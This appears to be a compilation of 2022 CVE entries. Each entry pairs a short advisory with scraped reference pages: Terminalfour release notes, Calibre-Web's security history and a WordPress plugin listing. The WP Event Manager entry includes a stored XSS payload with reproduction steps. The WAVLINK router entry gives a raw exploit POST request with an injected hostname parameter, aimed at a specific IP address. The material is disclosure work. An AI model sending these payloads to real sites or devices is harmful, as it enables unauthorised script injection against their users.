atmail 6.5.0 allows XSS via the index.php/admin/index/ error parameter.

CVE-2022-30776

A stored cross-site scripting (XSS) vulnerability in the upload function of totaljs CMS 3.4.5 allows attackers to execute arbitrary web scripts via a JavaScript embedded PDF file.

CVE-2022-30013

WordPress WP Event Manager plugin version 3.1.27 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin WP Event Manager  - Stored Cross SiteScripting# Date: 15-05-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/wp-event-manager/# Version: 3.1.27# Tested on: Firefox# Contact me: mariamtariq404@gmail.com#Steps To Reproduce :1 - First Install the plugins - wp-event-manager and activate it.2 - Go to event manager —> Add New3 - Inside the “”Event Title” at the top, enter XSS payload “><img src=xonerror=alert(1)> and hit publish.4 - Check the newly made event’s URL /event/{id}/ , XSS will trigger.#Poc Image :https://imgur.com/J1Q3x5u

WordPress WP Event Manager 3.1.27 Cross Site Scripting

Terminalfour before 8.3.8 allows XSS, aka RDSM-31817. 8.2.18.2.1 and 8.2.18.5 are also fixed versions.

**General****Workflows**

We received feedback about Workflow issues with multi-lingual Content Items, errors around rejection steps, and email functionality taking longer than it should. This release has over 20 fixes in place around the workflow functionality which should hopefully make things run smoother there.

**A couple of highlights:**

**RDSM-29134**

Approving Content Items in a Section Workflow configured to notify step moderators could be very slow. We've improved this by changing how those emails are queued and sent.

**RDSM-31244**

Previously if you modified and saved a Content Item where the reject settings were set to "Do nothing" and it had been already rejected in a Workflow, the Content Item did not re-enter or show up in the Workflow. That's fixed up now.

**RDSM-31306**

There were problems with rejecting independent Media Items that entered a Workflow. This has been resolved now.

**Performance**

**Moving mirrored sections - RDSM-25970**

As always we're still finding performance gains with each release. For this release our performance piece was around the time it takes to move a Mirrored Section. At a large scale (e.g. over 7000 Child Sections) this was very slow. With this update, the same action takes about 30% of the previous time, a welcome improvement.

**Fixes of note**

**Accessibility and anchor tags - RDSM-31347**

We made some adjustments to the meta\_anchor T4 Tag with this release. Previously that tag would output an <a> tag like this:

    <a id="d.en.10743"></a>

From an accessibility perspective, this isn't great –  it's not a link and it's not going anywhere – so we changed it from an <a> tag to a <span>. The linking functionality will work the same but the markup is better.

**Duplicating/mirroring/moving content to a Section, content ordering is lost - RDSM-28606**

As part of this release, we took a look at what is happening with ordering when content is mirrored/moved/duplicated. There were a few idiosyncrasies that we have ironed out now. For a view on the expected functionality see the new documentation.

**Translating a List into another language - RDSM-26130**

When you tried to translate a List you could end up on a blank screen. We had a workaround but it wasn't user-friendly, so we've fixed the problem and you should be able to translate lists again.

**Group names over 40 characters - RDSM-32481**

Up until now, Group names had to be under 40 characters. Now that's configurable from the database if it needs to be longer. 

**Content Syncer and extended user content type - RDSM-32242** 

We spotted a problem where the Content Syncer functionality was being blocked if the system had an extended user Content Type set. That's been fixed up now.

**Inactive Content Items that are made pending publish - RDSM-14098**

This is an issue that's worth keeping an eye out for as it's been around for a while and may change current publish behavior on some older pages (albeit incorrect behavior). In this scenario, we've seen that content that was made inactive, then updated to be pending (not approved) could be published. We've put a fix in so in this situation only approved content will be published.

CVE-2022-30770: Terminalfour 8.3.8 Release Notes

Calibre-Web before 0.6.18 allows user table SQL Injection.

**Security Policy****Reporting a Vulnerability**

Please report security issues to ozzie.fernandez.isaacs@googlemail.com

**Supported Versions**

To receive fixes for security vulnerabilities it is required to always upgrade to the latest version of Calibre-Web. See https://github.com/janeczku/calibre-web/releases/latest for the latest release.

**History**

Fixed in

Description

CVE number

3rd July 2018

Guest access acts as a backdoor

V 0.6.7

Hardcoded secret key for sessions

CVE-2020-12627

V 0.6.13

Calibre-Web Metadata cross site scripting

CVE-2021-25964

V 0.6.13

Name of Shelves are only visible to users who can access the corresponding shelf Thanks to @ibarrionuevo

V 0.6.13

JavaScript could get executed in the description field. Thanks to @ranjit-git and Hagai Wechsler (WhiteSource)

V 0.6.13

JavaScript could get executed in a custom column of type "comment" field

V 0.6.13

JavaScript could get executed after converting a book to another format with a title containing javascript code

V 0.6.13

JavaScript could get executed after converting a book to another format with a username containing javascript code

V 0.6.13

JavaScript could get executed in the description series, categories or publishers title

V 0.6.13

JavaScript could get executed in the shelf title

V 0.6.13

Login with the old session cookie after logout. Thanks to @ibarrionuevo

V 0.6.14

CSRF was possible. Thanks to @mik317 and Hagai Wechsler (WhiteSource)

CVE-2021-25965

V 0.6.14

Migrated some routes to POST-requests (CSRF protection). Thanks to @scara31

CVE-2021-4164

V 0.6.15

Fix for "javascript:" script links in identifier. Thanks to @scara31

CVE-2021-4170

V 0.6.15

Cross-Site Scripting vulnerability on uploaded cover file names. Thanks to @ibarrionuevo

V 0.6.15

Creating public shelfs is now denied if user is missing the edit public shelf right. Thanks to @ibarrionuevo

V 0.6.15

Changed error message in case of trying to delete a shelf unauthorized. Thanks to @ibarrionuevo

V 0.6.16

JavaScript could get executed on authors page. Thanks to @alicaz

CVE-2022-0352

V 0.6.16

Localhost can no longer be used to upload covers. Thanks to @scara31

CVE-2022-0339

V 0.6.16

Another case where public shelfs could be created without permission is prevented. Thanks to @nhiephon

CVE-2022-0273

V 0.6.16

It's prevented to get the name of a private shelfs. Thanks to @nhiephon

CVE-2022-0405

V 0.6.17

The SSRF Protection can no longer be bypassed via an HTTP redirect. Thanks to @416e6e61

CVE-2022-0767

V 0.6.17

The SSRF Protection can no longer be bypassed via 0.0.0.0 and it's ipv6 equivalent. Thanks to @r0hanSH

CVE-2022-0766

V 0.6.18

Possible SQL Injection is prevented in user table Thanks to Iman Sharafaldin (Forward Security)

CVE-2022-30765

V 0.6.18

The SSRF protection no longer can be bypassed by IPV6/IPV4 embedding. Thanks to @416e6e61

CVE-2022-0939

V 0.6.18

The SSRF protection no longer can be bypassed to connect to other servers in the local network. Thanks to @michaellrowley

CVE-2022-0990

**Statement regarding Log4j (CVE-2021-44228 and related)**

Calibre-web is not affected by bugs related to Log4j. Calibre-Web is a python program, therefore not using Java, and not using the Java logging feature log4j.

CVE-2022-30765: calibre-web/SECURITY.md at master · janeczku/calibre-web

Webmin through 1.991, when the Authentic theme is used, allows remote code execution when a user has been manually created (i.e., not created in Virtualmin or Cloudmin). This occurs because settings-editor_write.cgi does not properly restrict the file parameter.

CVE-2022-30708: Webmin

Authenticated (contributor or higher role) Cross-Site Scripting (XSS) vulnerability in Donations plugin <= 1.8 on WordPress.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of February 28, 2022 and is not available for download. Reason: Security Issue.

There is no way to edit the 'insert custom value' in the form page. it gets confusing for site visitor as an 'insert amount' would be certainly clearer. All in all, a very good plugin

Failed FAQ, no any reply to the question u asked

Hello this is great. LARGE DAMAGE: PAYMENT "STRIPE" NOT CONSIDERED. ONLY PAYPAL

Read all 8 reviews

“Donations” is open source software. The following people have contributed to this plugin.

Contributors

*    nicdark

CVE-2022-29433: Donations

WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi.

    POST /cgi-bin/login.cgi HTTP/1.1 Host: 98.127.66.193 Content-Length: 255 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://98.127.66.193 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://98.127.66.193/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close newUI=1&page=login&username=admin&langChange=0&ipaddr=171.113.240.243&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")&lt;/&gt;&lt;&gt;alert(1)&lt;/&gt;&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn

Tag

#xss